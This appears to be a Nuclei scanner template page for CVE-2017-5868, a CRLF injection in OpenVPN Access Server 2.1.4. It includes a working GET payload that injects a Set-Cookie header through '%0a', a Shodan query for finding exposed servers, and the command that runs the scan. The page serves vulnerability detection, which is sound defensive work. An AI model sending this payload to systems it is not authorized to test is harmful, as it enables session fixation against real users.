Skip to content

OpenVPN Access Server 2.1.4 - CRLF Injection

ID: CVE-2017-5868

Severity: medium

Author: ritikchaddha

Tags: cve,cve2017,openvpn,crlf

CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via “%0A” characters in the PATH_INFO to session_start/.

id: CVE-2017-5868
info:
name: OpenVPN Access Server 2.1.4 - CRLF Injection
author: ritikchaddha
severity: medium
description: |
CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.
reference:
- https://www.openwall.com/lists/oss-security/2017/05/23/13
- http://www.securitytracker.com/id/1038547
- https://nvd.nist.gov/vuln/detail/CVE-2017-5868
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-5868
cwe-id: CWE-93
epss-score: 0.00321
epss-percentile: 0.71031
cpe: cpe:2.3:a:openvpn:openvpn_access_server:2.1.4:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: openvpn
product: openvpn_access_server
shodan-query: cpe:"cpe:2.3:a:openvpn:openvpn_access_server"
tags: cve,cve2017,openvpn,crlf
http:
- method: GET
path:
- "{{BaseURL}}/__session_start__/%0aSet-Cookie:%20crlfinjection=1;"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "^Set-Cookie: crlfinjection=1;"
- type: status
status:
- 302
# digest: 4a0a00473045022100f3cae8aa1c48e00d976c07284182d037b7dae1159af227803b4e37bccc275555022051a64dfbe7e9466f2b3612e45a5063c2bf01148e8aa89a726901a4a0a2d309b0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-5868.yaml"

View on Github